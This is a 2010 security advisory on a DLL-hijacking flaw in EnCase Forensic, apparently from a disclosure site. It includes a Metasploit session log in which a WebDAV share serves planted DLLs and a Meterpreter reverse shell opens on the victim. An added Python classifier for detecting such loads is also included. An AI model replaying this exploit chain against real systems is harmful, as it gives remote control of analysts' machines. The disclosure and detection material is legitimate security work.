no one is safe ...

Advisory: EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking) [Update: 02.09.2010]

---------------------------------------------
EnCase - Insecure Library Loading Allows Remote Code Execution (DLL Hijacking)
Date: 29.08.2010
---------------------------------------------

- EnCase Description

From the simplest requirements to the most complex, EnCase Forensic is the premier computer forensic application on the market.

- Insecure Library Loading allows Remote Code Execution

This vulnerability was discovered using the Metasploit Framework with the following option: "set EXTENSIONS endump"

For more vulnerability details please check the links in the reference section.
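From a defender's side, the loads that the session output further down on this page records (system DLL names such as rsaenh.dll being fetched from a WebDAV share next to the opened file) are exactly what image-load telemetry can flag. The following is an added example, not part of the advisory and not EnCase code, of a small classifier for DLL search-order hijacking run over constructed module-load records. The process names, host name and paths in the sample records are hypothetical; the rule set assumes that system DLLs should resolve only under the Windows directory and that a DLL mapped from a UNC path or a user-writable folder is worth an alert.

```python
from dataclasses import dataclass
from typing import List, Optional
import ntpath

# Directory prefixes (lowercased, trailing backslash) that Windows itself is
# expected to serve system DLLs from. Keeping the trailing separator in the
# prefix avoids a false match on a directory such as "c:\windows2\...".
TRUSTED_PREFIXES = (
    "c:\\windows\\system32\\",
    "c:\\windows\\syswow64\\",
    "c:\\windows\\",
)

# DLL names that a correctly behaving application should only ever receive
# from the Windows directory. rsaenh.dll is the name the session output on
# this page shows being fetched over WebDAV; the others are a constructed
# sample of commonly hijacked system DLL names.
SYSTEM_DLL_NAMES = {"rsaenh.dll", "dwmapi.dll", "version.dll", "cryptsp.dll"}

# Path fragments typical of user-writable locations (profile folders, temp
# directories) where a planted DLL would sit beside the opened document.
USER_WRITABLE_MARKERS = ("\\users\\", "\\temp\\", "\\downloads\\")


@dataclass(frozen=True)
class ImageLoad:
    """One module-load record: which process mapped which DLL path."""
    process: str
    image: str


@dataclass(frozen=True)
class Finding:
    process: str
    image: str
    reason: str
    severity: str


def classify(event: ImageLoad) -> Optional[Finding]:
    """Return a Finding if the load looks like search-order hijacking, else None."""
    path = event.image.lower()
    name = ntpath.basename(path)

    # 1. A DLL mapped straight from a UNC path came from a remote share
    #    (WebDAV or SMB); legitimately installed libraries live locally.
    if path.startswith("\\\\"):
        return Finding(event.process, event.image,
                       "DLL mapped from UNC path (remote share)", "high")

    # 2. A system DLL name that resolved to a file outside the Windows
    #    directory means the loader found a same-named file earlier in
    #    its search order than the real one.
    if name in SYSTEM_DLL_NAMES and not path.startswith(TRUSTED_PREFIXES):
        return Finding(event.process, event.image,
                       "system DLL name loaded from outside the Windows directory", "high")

    # 3. Any DLL loaded from a user-writable location deserves a look, even
    #    when the name is application-specific rather than a system DLL.
    if any(marker in path for marker in USER_WRITABLE_MARKERS):
        return Finding(event.process, event.image,
                       "DLL loaded from user-writable location", "medium")

    return None


def scan(events: List[ImageLoad]) -> List[Finding]:
    """Run classify() over a batch of records and keep only the hits."""
    return [f for f in (classify(e) for e in events) if f is not None]


# Constructed sample records (hypothetical host name, process and paths, not
# taken from any real system). The first process stands in for a forensic
# tool that has just opened a case file from a network share.
SAMPLE_EVENTS = [
    ImageLoad("C:\\Program Files\\ForensicTool\\tool.exe",
              "C:\\Windows\\System32\\rsaenh.dll"),                 # normal
    ImageLoad("C:\\Program Files\\ForensicTool\\tool.exe",
              "\\\\fileserver\\documents\\rsaenh.dll"),             # rule 1
    ImageLoad("C:\\Program Files\\ForensicTool\\tool.exe",
              "\\\\fileserver\\documents\\SDDisk.dll"),             # rule 1
    ImageLoad("C:\\Program Files\\ForensicTool\\tool.exe",
              "C:\\Program Files\\ForensicTool\\SDDisk.dll"),       # normal
    ImageLoad("C:\\Program Files\\Office\\winword.exe",
              "C:\\Users\\analyst\\Downloads\\case\\version.dll"),  # rule 2
    ImageLoad("C:\\Program Files\\Office\\winword.exe",
              "C:\\Users\\analyst\\Downloads\\case\\helper.dll"),   # rule 3
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_EVENTS):
        print(f"[{finding.severity}] {finding.process} loaded "
              f"{finding.image}: {finding.reason}")
```

In practice the `ImageLoad` records would come from an image-load event source such as Sysmon Event ID 7 rather than an inline list; the rules stay the same. Rule 1 alone would have caught both DLL fetches visible in the WebDAV log on this page, since the loader requested them from a `\\server\share` path.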

- Affected Versions

v6.15.0.82/6.16.2/6.17.0.90 - other releases may also be affected.

- Solution

It is not known if there are fixed releases available.

- Credits

The vulnerability was discovered by m1k3 - m1k3#at#m1k3#dot#at

- Timeline

29.08.2010 - vulnerability discovered
29.08.2010 - public disclosure

- Reference

- Exploiting example:

msf exploit(webdav_dll_hijacker) > set EXTENSIONS endump
EXTENSIONS => endump
msf exploit(webdav_dll_hijacker) > show options

Module options:

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BASENAME    policy           yes       The base name for the listed files.
   EXTENSIONS  endump           yes       The list of extensions to generate
   SHARENAME   documents        yes       The name of the top-level share.
   SRVHOST     10.8.28.9        yes       The local host to listen on.
   SRVPORT     80               yes       The daemon port to listen on (do not change)
   URIPATH     /                yes       The URI to use (do not change).


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     10.8.28.9        yes       The listen address
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(webdav_dll_hijacker) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 10.8.28.9:4444
[*]
[*] Exploit links are now available at \\10.8.28.9\documents\
[*]
[*] Using URL: http://10.8.28.9:80/
[*] Server started.

msf exploit(webdav_dll_hijacker) >
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND /documents
[*] 10.8.28.55:49310 PROPFIND => 301 (/documents)
[*] 10.8.28.55:49310 PROPFIND /documents/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/documents/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rsaenh.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/rsaenh.dll)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /documents/SDDisk.dll
[*] 10.8.28.55:49310 PROPFIND => 207 File (/documents/SDDisk.dll)
[*] 10.8.28.55:49310 GET => DLL Payload
[*] 10.8.28.55:49310 PROPFIND /
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] 10.8.28.55:49310 PROPFIND /documents/rundll32.exe
[*] 10.8.28.55:49310 PROPFIND => 404 (/documents/rundll32.exe)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS
[*] 10.8.28.55:49310 PROPFIND => 301 (/DOCUMENTS)
[*] 10.8.28.55:49310 PROPFIND /DOCUMENTS/
[*] 10.8.28.55:49310 PROPFIND => 207 Directory (/DOCUMENTS/)
[*] 10.8.28.55:49310 PROPFIND => 207 Top-Level Directory
[*] Sending stage (748544 bytes) to 10.8.28.55
[*] Meterpreter session 14 opened (10.8.28.9:4444 -> 10.8.28.55:49315) at Sun Aug 29 20:01:53 +0200 2010

msf exploit(webdav_dll_hijacker) > sessions -i 14
[*] Starting interaction with 14...

meterpreter > getuid
Server username: m1k3-Vista\m1k3